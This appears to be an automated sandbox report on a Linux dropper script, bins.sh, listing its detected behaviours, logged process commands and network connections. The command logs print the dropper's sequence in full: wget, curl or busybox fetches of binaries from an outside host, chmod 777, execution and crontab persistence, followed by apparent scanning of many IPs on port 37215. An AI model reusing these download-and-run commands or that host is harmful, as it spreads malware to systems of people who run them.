Analysis Overview
SHA256
c4ffcebc0d441088029827d34c8dea73194328becf29e50825d908b5b2f5d661
Threat Level: Shows suspicious behavior
The file bins.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Renames itself
File and Directory Permissions Modification
Creates/modifies Cron job
Enumerates running processes
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-12-05 07:52
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-05 07:52
Reported
2024-12-05 07:54
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
149s
Max time network
131s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| GB | 195.181.164.14:443 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-05 07:52
Reported
2024-12-05 07:54
Platform
debian9-armhf-20240611-en
Max time kernel
150s
Max time network
153s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.nFADI4 | /usr/bin/crontab | N/A |
Enumerates running processes
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/265/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/692/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/699/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/716/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/789/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/824/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/12/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/27/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/783/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/835/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/902/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/17/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/645/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/702/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/780/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/25/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/650/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/844/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/862/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/863/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/891/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/710/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/792/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/867/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/290/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/451/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/802/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/871/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/882/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/1/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/812/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/872/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/724/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/786/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/738/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/781/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/813/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/877/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/886/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/887/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/893/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/731/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/906/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/720/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/745/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/330/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/840/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/744/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/787/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/810/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/859/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/402/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/717/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/14/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/726/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/260/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/774/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/861/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/794/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/836/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/23/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/740/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | /usr/bin/curl | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
/bin/chmod
[chmod 777 zZM090BtLw96clc18K3325Bi3InWJUorwB]
/tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB
[./zZM090BtLw96clc18K3325Bi3InWJUorwB]
/bin/sh
[sh -c crontab -l]
/usr/bin/crontab
[crontab -l]
/bin/sh
[sh -c crontab -]
/usr/bin/crontab
[crontab -]
/bin/rm
[rm zZM090BtLw96clc18K3325Bi3InWJUorwB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]
/bin/chmod
[chmod 777 ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]
/tmp/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG
[./ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]
/bin/rm
[rm ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]
/bin/chmod
[chmod 777 OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]
/tmp/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9
[./OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]
/bin/rm
[rm OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]
/bin/chmod
[chmod 777 Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]
/tmp/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX
[./Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]
/bin/rm
[rm Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]
/bin/chmod
[chmod 777 Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]
/tmp/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS
[./Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]
/bin/rm
[rm Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/jycs76M6vBIZ1GmDmLy0gXM9o11CS79Z9O]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:443 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:443 | conn.masjesu.zip | tcp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 69.142.119.224:37215 | tcp | |
| US | 18.3.191.68:37215 | tcp | |
| SG | 43.78.129.16:37215 | tcp | |
| US | 162.102.138.228:37215 | tcp | |
| US | 165.236.214.216:37215 | tcp | |
| US | 17.247.199.124:37215 | tcp | |
| US | 54.25.27.65:37215 | tcp | |
| US | 76.52.64.217:37215 | tcp | |
| US | 208.189.30.14:37215 | tcp | |
| TW | 120.104.147.95:37215 | tcp | |
| US | 17.10.187.166:37215 | tcp | |
| AU | 103.192.175.157:37215 | tcp | |
| GB | 109.180.133.68:37215 | tcp | |
| US | 68.91.202.150:37215 | tcp | |
| HK | 156.225.167.158:37215 | tcp | |
| RU | 213.151.28.166:37215 | tcp | |
| TW | 180.218.146.162:37215 | tcp | |
| US | 157.96.246.215:37215 | tcp | |
| US | 184.117.24.190:37215 | tcp | |
| RU | 178.155.12.58:37215 | tcp | |
| FR | 85.222.202.82:37215 | tcp | |
| US | 54.53.211.6:37215 | tcp | |
| DE | 95.222.234.131:37215 | tcp | |
| US | 68.165.156.81:37215 | tcp | |
| CN | 1.82.128.50:37215 | tcp | |
| US | 174.174.175.234:37215 | tcp | |
| AT | 156.58.155.150:37215 | tcp | |
| NL | 213.126.53.108:37215 | tcp | |
| CA | 142.82.93.247:37215 | tcp | |
| CN | 123.59.84.221:37215 | tcp | |
| CN | 27.14.109.151:37215 | tcp | |
| US | 168.229.122.63:37215 | tcp | |
| KR | 211.168.77.245:37215 | tcp | |
| AU | 203.1.240.63:37215 | tcp | |
| US | 169.228.15.150:37215 | tcp | |
| KR | 122.35.186.55:37215 | tcp | |
| US | 8.80.179.141:37215 | tcp | |
| JP | 126.76.48.179:37215 | tcp | |
| CL | 191.117.233.63:37215 | tcp | |
| FR | 62.68.65.208:37215 | tcp | |
| US | 50.115.118.1:37215 | tcp | |
| US | 64.65.229.66:37215 | tcp | |
| CN | 221.11.176.194:37215 | tcp | |
| US | 72.67.189.181:37215 | tcp | |
| US | 167.16.222.76:37215 | tcp | |
| US | 75.137.123.129:37215 | tcp | |
| DE | 95.222.234.131:80 | tcp | |
| US | 40.123.110.153:37215 | tcp | |
| US | 157.223.143.141:37215 | tcp | |
| DE | 2.202.212.94:37215 | tcp | |
| US | 3.152.75.174:37215 | tcp | |
| US | 70.183.110.242:37215 | tcp | |
| US | 70.89.206.61:37215 | tcp | |
| US | 57.125.252.42:37215 | tcp | |
| DE | 79.193.48.79:37215 | tcp | |
| CN | 121.32.165.48:37215 | tcp | |
| BR | 177.18.194.254:37215 | tcp | |
| US | 69.1.2.158:37215 | tcp | |
| US | 32.102.69.60:37215 | tcp | |
| US | 35.63.29.147:37215 | tcp | |
| US | 206.203.220.17:37215 | tcp | |
| IT | 80.19.154.252:37215 | tcp | |
| ID | 36.79.170.74:37215 | tcp | |
| CN | 14.148.116.187:37215 | tcp | |
| US | 3.82.152.41:37215 | tcp | |
| DE | 95.222.234.131:81 | tcp | |
| US | 44.112.254.128:37215 | tcp | |
| CN | 221.202.254.42:37215 | tcp | |
| US | 66.102.216.222:37215 | tcp | |
| DE | 2.202.212.94:80 | tcp | |
| RU | 176.107.250.169:37215 | tcp | |
| US | 96.149.194.215:37215 | tcp | |
| US | 69.79.129.120:37215 | tcp | |
| CN | 222.26.210.56:37215 | tcp | |
| US | 12.153.80.135:37215 | tcp | |
| ID | 39.230.241.27:37215 | tcp | |
| KW | 212.43.17.7:37215 | tcp | |
| CN | 42.102.62.228:37215 | tcp | |
| FI | 212.226.245.49:37215 | tcp | |
| EG | 45.105.207.10:37215 | tcp | |
| BR | 200.205.230.214:37215 | tcp | |
| CN | 123.197.194.234:37215 | tcp | |
| US | 169.130.91.95:37215 | tcp | |
| DE | 95.222.234.131:8080 | tcp | |
| DE | 2.202.212.94:81 | tcp | |
| FI | 212.226.245.49:80 | tcp | |
| DE | 95.222.234.131:52869 | tcp | |
| DE | 2.202.212.94:8080 | tcp | |
| FI | 212.226.245.49:81 | tcp | |
| DE | 95.222.234.131:7574 | tcp | |
| JP | 126.76.48.179:80 | tcp | |
| DE | 2.202.212.94:52869 | tcp | |
| DE | 95.222.234.131:5555 | tcp | |
| FI | 212.226.245.49:8080 | tcp | |
| DE | 2.202.212.94:7574 | tcp | |
| FI | 212.226.245.49:52869 | tcp | |
| SG | 43.78.129.16:80 | tcp | |
| US | 165.236.214.216:80 | tcp | |
| US | 69.142.119.224:80 | tcp | |
| US | 76.52.64.217:80 | tcp | |
| US | 17.10.187.166:80 | tcp | |
| TW | 120.104.147.95:80 | tcp | |
| US | 17.247.199.124:80 | tcp | |
| US | 54.25.27.65:80 | tcp | |
| US | 208.189.30.14:80 | tcp | |
| US | 162.102.138.228:80 | tcp | |
| AU | 103.192.175.157:80 | tcp | |
| US | 18.3.191.68:80 | tcp | |
| US | 184.117.24.190:80 | tcp | |
| FR | 85.222.202.82:80 | tcp | |
| TW | 180.218.146.162:80 | tcp | |
| US | 54.53.211.6:80 | tcp | |
| US | 174.174.175.234:80 | tcp | |
| NL | 213.126.53.108:80 | tcp | |
| CA | 142.82.93.247:80 | tcp | |
| CN | 1.82.128.50:80 | tcp | |
| HK | 156.225.167.158:80 | tcp | |
| US | 157.96.246.215:80 | tcp | |
| AT | 156.58.155.150:80 | tcp | |
| FI | 212.226.245.49:7574 | tcp | |
| US | 68.91.202.150:80 | tcp | |
| US | 68.165.156.81:80 | tcp | |
| RU | 213.151.28.166:80 | tcp | |
| RU | 178.155.12.58:80 | tcp | |
| GB | 109.180.133.68:80 | tcp | |
| KR | 122.35.186.55:80 | tcp | |
| US | 72.67.189.181:80 | tcp | |
| CN | 123.59.84.221:80 | tcp | |
| US | 169.228.15.150:80 | tcp | |
| US | 168.229.122.63:80 | tcp | |
| US | 167.16.222.76:80 | tcp | |
| US | 50.115.118.1:80 | tcp | |
| US | 64.65.229.66:80 | tcp | |
| CN | 221.11.176.194:80 | tcp | |
| US | 8.80.179.141:80 | tcp | |
| US | 75.137.123.129:80 | tcp | |
| AU | 203.1.240.63:80 | tcp | |
| CN | 27.14.109.151:80 | tcp | |
| KR | 211.168.77.245:80 | tcp | |
| CL | 191.117.233.63:80 | tcp | |
| FR | 62.68.65.208:80 | tcp | |
| FI | 212.226.245.49:5555 | tcp | |
| US | 57.125.252.42:80 | tcp | |
| DE | 79.193.48.79:80 | tcp | |
| US | 70.89.206.61:80 | tcp | |
| US | 40.123.110.153:80 | tcp | |
| US | 70.183.110.242:80 | tcp | |
| US | 3.152.75.174:80 | tcp | |
| US | 157.223.143.141:80 | tcp | |
| BR | 177.18.194.254:80 | tcp | |
| CN | 121.32.165.48:80 | tcp | |
| ID | 36.79.170.74:80 | tcp | |
| US | 69.1.2.158:80 | tcp | |
| US | 35.63.29.147:80 | tcp | |
| US | 69.79.129.120:80 | tcp | |
| US | 44.112.254.128:80 | tcp | |
| RU | 176.107.250.169:80 | tcp | |
| US | 206.203.220.17:80 | tcp | |
| US | 3.82.152.41:80 | tcp | |
| CN | 14.148.116.187:80 | tcp | |
| US | 96.149.194.215:80 | tcp | |
| IT | 80.19.154.252:80 | tcp | |
| US | 32.102.69.60:80 | tcp | |
| US | 66.102.216.222:80 | tcp | |
| CN | 221.202.254.42:80 | tcp | |
| US | 12.153.80.135:80 | tcp | |
| US | 169.130.91.95:80 | tcp | |
| ID | 39.230.241.27:80 | tcp | |
| CN | 42.102.62.228:80 | tcp | |
| EG | 45.105.207.10:80 | tcp | |
| BR | 200.205.230.214:80 | tcp | |
| KW | 212.43.17.7:80 | tcp | |
| CN | 222.26.210.56:80 | tcp | |
| CN | 123.197.194.234:80 | tcp | |
| FI | 212.226.245.49:49152 | tcp | |
| US | 3.82.152.41:81 | tcp | |
| FI | 212.226.245.49:8443 | tcp | |
| JP | 126.76.48.179:81 | tcp | |
| NL | 145.210.134.181:37215 | tcp | |
| DE | 95.222.234.131:49152 | tcp | |
| DE | 2.202.212.94:5555 | tcp | |
| US | 162.102.138.228:81 | tcp | |
| US | 68.91.202.150:81 | tcp | |
| HK | 156.225.167.158:81 | tcp | |
| SG | 43.78.129.16:81 | tcp | |
| US | 76.52.64.217:81 | tcp | |
| TW | 120.104.147.95:81 | tcp | |
| US | 208.189.30.14:81 | tcp | |
| FR | 85.222.202.82:81 | tcp | |
| US | 17.10.187.166:81 | tcp | |
| US | 165.236.214.216:81 | tcp | |
| AT | 156.58.155.150:81 | tcp | |
| GB | 109.180.133.68:81 | tcp | |
| US | 17.247.199.124:81 | tcp | |
| US | 157.96.246.215:81 | tcp | |
| RU | 213.151.28.166:81 | tcp | |
| US | 68.165.156.81:81 | tcp | |
| US | 69.142.119.224:81 | tcp | |
| NL | 213.126.53.108:81 | tcp | |
| US | 174.174.175.234:81 | tcp | |
| AU | 103.192.175.157:81 | tcp | |
| US | 18.3.191.68:81 | tcp | |
| US | 184.117.24.190:81 | tcp | |
| CN | 1.82.128.50:81 | tcp | |
| TW | 180.218.146.162:81 | tcp | |
| US | 54.25.27.65:81 | tcp | |
| RU | 178.155.12.58:81 | tcp | |
| US | 54.53.211.6:81 | tcp | |
| CA | 142.82.93.247:81 | tcp | |
| US | 72.67.189.181:81 | tcp | |
| US | 168.229.122.63:81 | tcp | |
| US | 167.16.222.76:81 | tcp | |
| US | 50.115.118.1:81 | tcp | |
| US | 8.80.179.141:81 | tcp | |
| AU | 203.1.240.63:81 | tcp | |
| CN | 27.14.109.151:81 | tcp | |
| KR | 122.35.186.55:81 | tcp | |
| US | 75.137.123.129:81 | tcp | |
| US | 169.228.15.150:81 | tcp | |
| CN | 123.59.84.221:81 | tcp | |
| KR | 211.168.77.245:81 | tcp | |
| CN | 221.11.176.194:81 | tcp | |
| US | 64.65.229.66:81 | tcp | |
| US | 157.223.143.141:81 | tcp | |
| CL | 191.117.233.63:81 | tcp | |
| DE | 79.193.48.79:81 | tcp | |
| US | 3.152.75.174:81 | tcp | |
| US | 70.89.206.61:81 | tcp | |
| BR | 177.18.194.254:81 | tcp | |
| US | 40.123.110.153:81 | tcp | |
| FR | 62.68.65.208:81 | tcp | |
| US | 70.183.110.242:81 | tcp | |
| US | 57.125.252.42:81 | tcp | |
| CN | 121.32.165.48:81 | tcp | |
| RU | 176.107.250.169:81 | tcp | |
| CN | 221.202.254.42:81 | tcp | |
| IT | 80.19.154.252:81 | tcp | |
| US | 32.102.69.60:81 | tcp | |
| US | 44.112.254.128:81 | tcp | |
| US | 35.63.29.147:81 | tcp | |
| US | 206.203.220.17:81 | tcp | |
| US | 96.149.194.215:81 | tcp | |
| US | 66.102.216.222:81 | tcp | |
| US | 69.79.129.120:81 | tcp | |
| US | 69.1.2.158:81 | tcp | |
| ID | 36.79.170.74:81 | tcp | |
| CN | 14.148.116.187:81 | tcp | |
| CN | 42.102.62.228:81 | tcp | |
| US | 169.130.91.95:81 | tcp | |
| BR | 200.205.230.214:81 | tcp | |
| EG | 45.105.207.10:81 | tcp | |
| ID | 39.230.241.27:81 | tcp | |
| US | 12.153.80.135:81 | tcp | |
| CN | 222.26.210.56:81 | tcp | |
| KW | 212.43.17.7:81 | tcp | |
| CN | 123.197.194.234:81 | tcp | |
| US | 3.82.152.41:8080 | tcp | |
| NL | 145.210.134.181:80 | tcp | |
| JP | 126.76.48.179:8080 | tcp | |
| DE | 95.222.234.131:8443 | tcp | |
| DE | 2.202.212.94:49152 | tcp | |
| DK | 2.105.79.16:37215 | tcp | |
| DE | 2.202.212.94:8443 | tcp | |
| US | 75.137.123.129:8080 | tcp | |
| US | 54.53.211.6:8080 | tcp | |
| US | 184.117.24.190:8080 | tcp | |
| US | 18.3.191.68:8080 | tcp | |
| US | 72.67.189.181:8080 | tcp | |
| US | 162.102.138.228:8080 | tcp | |
| CA | 142.82.93.247:8080 | tcp | |
| US | 157.96.246.215:8080 | tcp | |
| US | 54.25.27.65:8080 | tcp | |
| US | 69.142.119.224:8080 | tcp | |
| US | 165.236.214.216:8080 | tcp | |
| HK | 156.225.167.158:8080 | tcp | |
| AT | 156.58.155.150:8080 | tcp | |
| TW | 120.104.147.95:8080 | tcp | |
| FR | 85.222.202.82:8080 | tcp | |
| KR | 211.168.77.245:8080 | tcp | |
| KR | 122.35.186.55:8080 | tcp | |
| RU | 213.151.28.166:8080 | tcp | |
| SG | 43.78.129.16:8080 | tcp | |
| CN | 123.59.84.221:8080 | tcp | |
| US | 208.189.30.14:8080 | tcp | |
| US | 68.91.202.150:8080 | tcp | |
| US | 174.174.175.234:8080 | tcp | |
| AU | 203.1.240.63:8080 | tcp | |
| US | 169.228.15.150:8080 | tcp | |
| CN | 1.82.128.50:8080 | tcp | |
| CN | 221.11.176.194:8080 | tcp | |
| US | 167.16.222.76:8080 | tcp | |
| US | 17.10.187.166:8080 | tcp | |
| US | 76.52.64.217:8080 | tcp | |
| US | 50.115.118.1:8080 | tcp | |
| US | 17.247.199.124:8080 | tcp | |
| TW | 180.218.146.162:8080 | tcp | |
| US | 8.80.179.141:8080 | tcp | |
| CN | 27.14.109.151:8080 | tcp | |
| NL | 213.126.53.108:8080 | tcp | |
| GB | 109.180.133.68:8080 | tcp | |
| AU | 103.192.175.157:8080 | tcp | |
| RU | 178.155.12.58:8080 | tcp | |
| US | 68.165.156.81:8080 | tcp | |
| US | 168.229.122.63:8080 | tcp | |
| US | 64.65.229.66:8080 | tcp | |
| US | 70.183.110.242:8080 | tcp | |
| BR | 177.18.194.254:8080 | tcp | |
| RU | 176.107.250.169:8080 | tcp | |
| US | 3.152.75.174:8080 | tcp | |
| CN | 121.32.165.48:8080 | tcp | |
| US | 157.223.143.141:8080 | tcp | |
| DE | 79.193.48.79:8080 | tcp | |
| FR | 62.68.65.208:8080 | tcp | |
| US | 70.89.206.61:8080 | tcp | |
| US | 40.123.110.153:8080 | tcp | |
| IT | 80.19.154.252:8080 | tcp | |
| CN | 221.202.254.42:8080 | tcp | |
| CL | 191.117.233.63:8080 | tcp | |
| US | 57.125.252.42:8080 | tcp | |
| US | 206.203.220.17:8080 | tcp | |
| US | 44.112.254.128:8080 | tcp | |
| US | 69.79.129.120:8080 | tcp | |
| US | 32.102.69.60:8080 | tcp | |
| US | 96.149.194.215:8080 | tcp | |
| CN | 14.148.116.187:8080 | tcp | |
| US | 66.102.216.222:8080 | tcp | |
